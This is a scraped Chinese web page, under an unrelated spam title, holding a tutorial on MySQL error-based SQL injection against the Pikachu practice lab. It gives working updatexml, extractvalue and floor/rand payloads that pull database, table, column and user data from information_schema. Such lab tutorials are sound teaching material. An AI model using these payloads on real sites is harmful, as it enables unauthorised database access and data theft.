当前位置: 首页 > news >正文

人工智能 网站建设起名字2023免费八字起名

news 2025/9/13 20:43:32
人工智能 网站建设,起名字2023免费八字起名,邯郸市网络科技有限公司,网站打开速度慢是什么原因常用的用来报错的函数 updatexml() : 函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。 extractvalue(): 函数也是MYSQL对XML文档数据进行查询的XPATH函数。 floor(): MYSQL中用来取整的函数。 思路: 在MySQL中使用一些指定的函数来制造报错&am…

常用的用来报错的函数
updatexml() :   函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。
extractvalue(): 函数也是MYSQL对XML文档数据进行查询的XPATH函数。
floor():             MYSQL中用来取整的函数。

思路:

在MySQL中使用一些指定的函数来制造报错,从而从报错信息中获取设定的信息。select / insert / update / delete 都可以使用报错来获取信息。

前提条件是后台没有屏蔽数据库报错信息,在语法发生错误时,会输出到前端。

updatexml()
Updatexm()函数作用: 改变(查找并替换) XML文档中符合条件的节点的值。
语法: UPDATEXML (xml document, XPathstring, new_value)

第一个参数: fiedname是String格式,为表中的字段名。
第二个参数: XPathstring (Xpath格式的字符串)。
第三个参数: new. value,String格式,替换查找到的符合条件的

Xpath定位必须是有效的,否则会发生错误。 

pikachu - 字符型注入(GET) 实验:

aa' and updatexml(1,concat(0x7e,database()),0)#// 0x7e  是 ~ 的十六进制 ,避免报错信息被吃掉;

如果没有concat ,而是aa' and updatexml(1,database(),0)#   

这样报错信息会少一部分,没法完全展示;

获取到了数据库名称 pikachu,我们可以把 database() 替换成任意我们想要获得的东西。

得到数据库名称后,根据数据库名,查询表名

aa' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'pikachu')),0)#
// 中间的select 语句要用() 括号括起来//查询报多于一行
aa' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'pikachu' limit 1)),0)#

使用上述语句,查到第一张表名;继续使用limit 1,1   或 limit 2,1 查询下去,可以把所有的表名查询出来; 或者burp suite  参数化查询把所有表查出来。

得到表名后,可以根据表名查询字段名

aa' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = 'users' limit 0,1)),0)#

得到所有列名。可以根据列名获取数据

aa' and updatexml(1,concat(0x7e,(select username from users limit 0,1)),0)#


extractvalue()

extractvalue()函数作用:从目标XML中返回包含所查询值的字符串。
语法: ExtractValue(xm| _document, xpath. string)

第一个参数: XML document是String格式,为XML文档对象的名称,文中为Doc
第二个参数: XPath_ string (Xpath格式的字符串)

Xpath定位必须是有效的,否则会发生错误。
打开字符型注入,输入payload。

aa' and extractvalue(0,concat(0x7e,version()))#


效果差不多,理解以此类推即可。

floor()

原因:floor()报错注入的原因是 groupby 在向临时表插入数据时,由于rand()多次计算导致插入临时表时主键重复,从而报错,又因为报错前 concat()中的SQL语句或函数被执行,所以该语句报错且被抛出的主键是SQL语句或数执行后的结果。

floor()函数:对传入的值进行向下取整操作,并返回结果,如floor(1.999),则返回1 ;

rand()函数,返回随机数

rand(x)函数,x在这里代表参数,当rand()函数有了参数后,生成的就是伪随机数,什么意思呢?比如你使用rand(0)产生的第一个随机数产生的随机数相同,也就是当rand(x)这个参数x已知的时候我们就能知道;

在字符型中输入payload得到版本号。

aa' and (select 2 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#


 

http://www.15wanjia.com/news/155699.html

相关文章:

  • 企业网站设计解决方案wordpress更改上传的大小
  • 网站前端建设建筑行业网
  • 山西省煤炭厅基本建设局网站网站外部链接怎么做
  • 剑阁住房和城乡建设厅网站jae wordpress
  • 网站要多钱深圳专业网站设计公司价格
  • 做海报有什么好的网站推荐网页加入信任站点
  • 有了网站域名如何做网站在线制作wap网站
  • 做淘宝图的素材搜索网站wordpress用户权限插件
  • 哈尔滨网站建设方案外包医院有关页面设计模板
  • 做买衣服的网站wordpress怎么在虚拟主机上搭建
  • 做韦恩图的在线网站手机网站如何建站
  • 北京网站托管的公司哪家好全网热搜榜第一名
  • 什么网站可以做家禽交易邢台经济开发区
  • 常州公司建站模板外贸平台哪个网站最好知乎
  • 什么是网站定位注册网站商标多少钱
  • 建立网站得多少钱技术先进的网站建设公
  • 初中做语文题的网站做游戏的外包网站
  • 网站开发美工绩效考核永久有效的代理ip
  • go语言 网站开发安徽六安特产
  • 上杭网站制作购物网站策划方案
  • .tech域名的网站营销型网站建设教程视频教程
  • 潍坊网站模板建站如何在58同城发布广告
  • 有没有做羞羞的网站政务公开网
  • 咖啡的网站建设策划书vs2012网站开发课程设计
  • 广东网站制作公司服务器建网站教程
  • 龙华网站建设专业定制企业温州免费网站建站模板
  • 行业门户网站源码做网站公司q房网
  • 鹤山网站建设菠菜推广
  • 做网站属于印花税哪个范畴网站服务器配置参考指南
  • 网站app充值记账凭证怎么做wordpress 文章在数据库